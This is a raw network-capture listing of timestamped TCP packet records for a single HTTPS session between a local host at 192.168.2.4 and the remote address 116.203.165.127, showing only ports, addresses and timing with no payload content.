Sep 20, 2024 11:07:34.951288939 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.951337099 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.951407909 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.951419115 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.951448917 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.951471090 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.965158939 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.965179920 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.965249062 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.965271950 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.965406895 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.981652021 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.981682062 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.981786013 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.981808901 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.982125044 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.991405010 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.991447926 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.991492987 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.991514921 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.991522074 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.991561890 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.004957914 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.004986048 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.005119085 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.005146027 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.005198002 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.015213013 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.015234947 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.015326977 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.015348911 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.015410900 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.031929016 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.031949043 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.032109976 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.032139063 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.032531977 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.038353920 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.038374901 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.038444042 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.038460016 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.038511992 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.043634892 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.043657064 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.043715954 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.043724060 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.043766022 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.057600021 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.057674885 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.057760000 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.057768106 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.057811975 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.057851076 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.076195002 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.076216936 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.076306105 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.076329947 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.076724052 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.084279060 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.084300041 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.084383965 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.084399939 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.084453106 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.097754002 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.097774982 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.097887039 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.097898960 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.098115921 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.108457088 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.108491898 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.108560085 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.108572960 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.108593941 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.108628988 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.124480963 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.124507904 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.124597073 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.124608994 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.124669075 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.130930901 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.130974054 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.131047964 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.131057978 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.131103992 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.136219025 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.136239052 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.136291027 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.136300087 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.136339903 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.150289059 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.150367022 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.150425911 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.150437117 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.150475979 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.150484085 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.168642044 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.168661118 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.168740988 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.168756008 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.168869019 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.178116083 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.178164005 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.178201914 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.178211927 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.178230047 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.178268909 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.190432072 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.190460920 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.190557957 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.190570116 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.190637112 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.190675020 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.205115080 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.205136061 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.205183983 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.205194950 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.205209017 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.205235004 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.217092037 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.217111111 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.217156887 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.217169046 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.217200994 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.217231035 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.223670959 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.223691940 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.223747015 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.223757029 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.223783016 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.223810911 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.228828907 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.228846073 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.228918076 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.228934050 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.228982925 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.242527008 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.242546082 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.242652893 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.242664099 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.242741108 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.261506081 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.261537075 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.261605024 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.261614084 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.261640072 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.261672974 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.271457911 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.271483898 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.271557093 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.271574020 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.271639109 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.283070087 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.283093929 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.283200026 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.283214092 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.283276081 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.297930956 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.298002005 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.298033953 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.298044920 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.298074961 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.298099995 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.309880972 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.309905052 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.309993029 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.310003042 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.310055017 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.316112995 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.316134930 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.316214085 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.316221952 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.316266060 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.321338892 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.321363926 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.321422100 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.321432114 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.321516991 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.335196972 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.335213900 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.335282087 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.335293055 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.335413933 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.355688095 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.355746984 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.355818033 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.355832100 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.355853081 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.355873108 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.365382910 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.365406036 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.365497112 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.365505934 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.365560055 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.375885010 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.375905991 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.375989914 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.376002073 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.376157999 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.390747070 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.390791893 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.390841961 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.390866995 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.390885115 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.390902996 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.402362108 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.402439117 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.402463913 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.402472019 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.402503014 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.402522087 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.412147999 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.412179947 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.412363052 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.412374020 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.412425995 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.417303085 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.417365074 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.417403936 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.417412043 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.417443037 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.417463064 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.430500031 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.430530071 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.430577993 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.430587053 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.430609941 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.430644035 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.451045036 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.451071978 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.451153994 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.451164007 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.451185942 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.451210022 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.458260059 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.458285093 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.458324909 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.458333015 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.458364964 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.458389044 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.468575001 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.468651056 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.468671083 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.468678951 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.468713045 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.468748093 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.485596895 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.485622883 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.485671043 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.485680103 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.485704899 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.485737085 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.502321005 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.502352953 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.502437115 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.502446890 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.502484083 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.502511024 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.508920908 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.508956909 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.509000063 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.509007931 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.509041071 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.509066105 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.510804892 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.510831118 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.510879040 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.510888100 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.510910034 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.510940075 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.522953987 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.522984028 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.523050070 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.523060083 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.523104906 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.543709993 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.543739080 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.543783903 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.543797016 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.543818951 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.543858051 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.553092003 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.553143024 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.553174019 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.553181887 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.553205013 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.553231955 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.561749935 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.561774015 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.561830997 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.561839104 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.561863899 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.561891079 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.578352928 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.578383923 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.578445911 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.578459024 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.578469992 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.578493118 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.595046043 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.595072985 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.595160007 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.595170975 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.595217943 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.601746082 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.601768970 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.601875067 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.601886034 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.601926088 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.603324890 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.603346109 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.603404999 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.603414059 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.603437901 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.603466988 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.615483046 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.615513086 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.615576029 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.615591049 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.615600109 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.615628958 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.633800983 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.633833885 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.633910894 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.633919001 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.633949995 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.633968115 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.643482924 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.643521070 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.643596888 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.643604994 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.643646955 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:35.653539896 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:35.653570890 CEST	443	49744	116.203.165.127	192.168.2.4
